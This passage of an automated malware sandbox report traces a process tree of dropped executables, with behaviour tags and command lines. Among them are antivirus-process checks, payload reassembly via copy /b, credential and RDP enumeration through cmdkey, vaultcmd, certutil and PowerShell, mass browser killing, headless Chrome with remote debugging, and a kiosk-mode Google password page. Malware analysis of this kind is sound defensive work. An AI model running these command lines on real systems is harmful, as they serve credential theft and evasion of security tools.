      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3492
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:1444
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        7⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4412
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2032 -prefsLen 27099 -prefMapHandle 2036 -prefMapSize 270279 -ipcHandle 2112 -initialChannelId {328ea2b1-5a4b-4b0c-aa98-5697729172e8} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        8⤵
        
        PID:4556
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2520 -prefsLen 27135 -prefMapHandle 2524 -prefMapSize 270279 -ipcHandle 2532 -initialChannelId {5ca99fd6-c12d-4f9c-8756-5afcfc662c58} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        8⤵
        Checks processor information in registry
        
        PID:1348
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4004 -prefsLen 25213 -prefMapHandle 4008 -prefMapSize 270279 -jsInitHandle 4012 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4020 -initialChannelId {f27bc7dc-38f2-43c3-97dd-2d98f9c84f05} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        8⤵
        Checks processor information in registry
        
        PID:1232
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4176 -prefsLen 27325 -prefMapHandle 4180 -prefMapSize 270279 -ipcHandle 4244 -initialChannelId {04e79b99-6bb3-45f6-a753-8f482ada4c0b} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        8⤵
        
        PID:3640
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3156 -prefsLen 34824 -prefMapHandle 2980 -prefMapSize 270279 -jsInitHandle 3524 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1680 -initialChannelId {2137c7d2-0516-42a0-92bc-d16613dfaa34} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        8⤵
        Checks processor information in registry
        
        PID:5768
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4668 -prefsLen 35012 -prefMapHandle 5064 -prefMapSize 270279 -ipcHandle 5072 -initialChannelId {9113f7b3-3966-41b8-bddf-c4a4250e6dfb} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        8⤵
        Checks processor information in registry
        
        PID:7560
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5324 -prefsLen 32952 -prefMapHandle 5328 -prefMapSize 270279 -jsInitHandle 5332 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5336 -initialChannelId {acc30cd9-6a12-4dd9-9198-93b3b793a975} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        8⤵
        Checks processor information in registry
        
        PID:7836
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5328 -prefsLen 32952 -prefMapHandle 5324 -prefMapSize 270279 -jsInitHandle 5384 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5556 -initialChannelId {107bf615-504c-4775-85a0-a7c6cedbafb2} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        8⤵
        Checks processor information in registry
        
        PID:7848
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5716 -prefsLen 32952 -prefMapHandle 5720 -prefMapSize 270279 -jsInitHandle 5724 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5732 -initialChannelId {4e0ba08f-77a1-4d63-b3c3-e2360a3e6965} -parentPid 4412 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4412" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        8⤵
        Checks processor information in registry
        
        PID:7860
    - - C:\Users\Admin\AppData\Local\Temp\10417020101\9220b9dffd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417020101\9220b9dffd.exe"
        5⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
    - - C:\Users\Admin\AppData\Local\Temp\10417030101\ca8acd6286.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417030101\ca8acd6286.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5092
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:4516
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5368
    - - C:\Users\Admin\AppData\Local\Temp\10417040101\3514bb24fc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417040101\3514bb24fc.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5200
    - - C:\Users\Admin\AppData\Local\Temp\10417050101\3sZiUQa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417050101\3sZiUQa.exe"
        5⤵
        Executes dropped EXE
        
        PID:6368
    - - C:\Users\Admin\AppData\Local\Temp\10417060101\91c4598add.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417060101\91c4598add.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6576
    - - C:\Users\Admin\AppData\Local\Temp\10417070101\h8NlU62.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417070101\h8NlU62.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6796
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6820
    - - C:\Users\Admin\AppData\Local\Temp\10417080101\XOPPRUc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417080101\XOPPRUc.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:724
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5560
    - - C:\Users\Admin\AppData\Local\Temp\10417090101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417090101\7IIl2eE.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3744
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:376
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7900
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:6032
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6028
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3624
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:216
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5344
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:620
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4420
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5456
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4836
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4576
    - - C:\Users\Admin\AppData\Local\Temp\10417100101\captcha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10417100101\captcha.exe"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        
        PID:8096
      - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3539616762.txt\""
        6⤵
        NTFS ADS
        
        PID:7916
      - C:\Windows\system32\net.exe
        
        "net" statistics workstation
        6⤵
        
        PID:3632
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 statistics workstation
        7⤵
        
        PID:5296
      - C:\Windows\system32\vaultcmd.exe
        
        "vaultcmd" /list
        6⤵
        
        PID:2920
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3480
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4404
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FO CSV /NH
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6188
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5840
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        6⤵
        
        PID:764
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:740
        
        C:\Windows\system32\cmdkey.exe
        
        "C:\Windows\system32\cmdkey.exe" /list
        7⤵
        
        PID:6584
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2412
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6452
      - C:\Windows\system32\certutil.exe
        
        "certutil" -store My
        6⤵
        
        PID:6712
      - C:\Windows\system32\certutil.exe
        
        "certutil" -store -user My
        6⤵
        
        PID:6748
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6760
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6872
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6992
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
        6⤵
        Command and Scripting Interpreter: PowerShell
        Hide Artifacts: Ignore Process Interrupts
        Suspicious use of AdjustPrivilegeToken
        
        PID:7144
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:7192
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        6⤵
        
        PID:7328
      - C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list:TERMSRV/69.48.201.74
        6⤵
        
        PID:7404
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:7524
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:7576
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:7608
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM msedge.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4944
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM brave.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6136
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM opera.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5952
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM vivaldi.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:316
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6892
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM firefox.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2648
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3604
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM dragon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3620
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM maxthon.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1576
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4800
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM uc_browser.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4924
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM slimjet.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6224
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6220
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM cent_browser.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4824
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM epic.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6240
      - C:\Windows\system32\tasklist.exe
        
        "tasklist"
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3812
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM torch.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6484
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6536
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM whale.exe
        6⤵
        Kills process with taskkill
        
        PID:740
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM Discord.exe
        6⤵
        Kills process with taskkill
        
        PID:2408
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM 360browser.exe
        6⤵
        Kills process with taskkill
        
        PID:6532
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordCanary.exe
        6⤵
        Kills process with taskkill
        
        PID:6528
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM qqbrowser.exe
        6⤵
        Kills process with taskkill
        
        PID:6764
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordPTB.exe
        6⤵
        Kills process with taskkill
        
        PID:6820
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM browser.exe
        6⤵
        Kills process with taskkill
        
        PID:6828
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordDevelopment.exe
        6⤵
        Kills process with taskkill
        
        PID:6884
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:6876
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        6⤵
        Kills process with taskkill
        
        PID:7188
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM brave.exe
        6⤵
        Kills process with taskkill
        
        PID:7256
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM opera.exe
        6⤵
        Kills process with taskkill
        
        PID:7172
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM vivaldi.exe
        6⤵
        Kills process with taskkill
        
        PID:7016
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM firefox.exe
        6⤵
        Kills process with taskkill
        
        PID:7364
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM dragon.exe
        6⤵
        Kills process with taskkill
        
        PID:7468
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM maxthon.exe
        6⤵
        Kills process with taskkill
        
        PID:7192
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM uc_browser.exe
        6⤵
        Kills process with taskkill
        
        PID:7476
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM slimjet.exe
        6⤵
        Kills process with taskkill
        
        PID:7776
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM cent_browser.exe
        6⤵
        Kills process with taskkill
        
        PID:4444
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM epic.exe
        6⤵
        Kills process with taskkill
        
        PID:7536
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM torch.exe
        6⤵
        Kills process with taskkill
        
        PID:4376
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM whale.exe
        6⤵
        Kills process with taskkill
        
        PID:7576
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM 360browser.exe
        6⤵
        Kills process with taskkill
        
        PID:4856
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM qqbrowser.exe
        6⤵
        Kills process with taskkill
        
        PID:1564
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM browser.exe
        6⤵
        Kills process with taskkill
        
        PID:1492
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq chrome.exe"
        6⤵
        Enumerates processes with tasklist
        
        PID:7996
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=48988 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
        6⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious use of FindShellTrayWindow
        
        PID:2820
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb56e5dcf8,0x7ffb56e5dd04,0x7ffb56e5dd10
        7⤵
        
        PID:8056
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2328,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2320 /prefetch:2
        7⤵
        Modifies registry class
        
        PID:1508
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2408,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2404 /prefetch:3
        7⤵
        
        PID:5844
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2424,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2416 /prefetch:8
        7⤵
        
        PID:4528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=48988 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2968,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2964 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:1628
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=48988 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3176 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:6188
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=48988 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3880,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3940 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:7960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4564,i,18175538464331756967,9388245021895023298,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4560 /prefetch:8
        7⤵
        
        PID:4908
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq chrome.exe"
        6⤵
        Enumerates processes with tasklist
        
        PID:6232
      - C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:6552
      - C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq msedge.exe"
        6⤵
        Enumerates processes with tasklist
        
        PID:7276
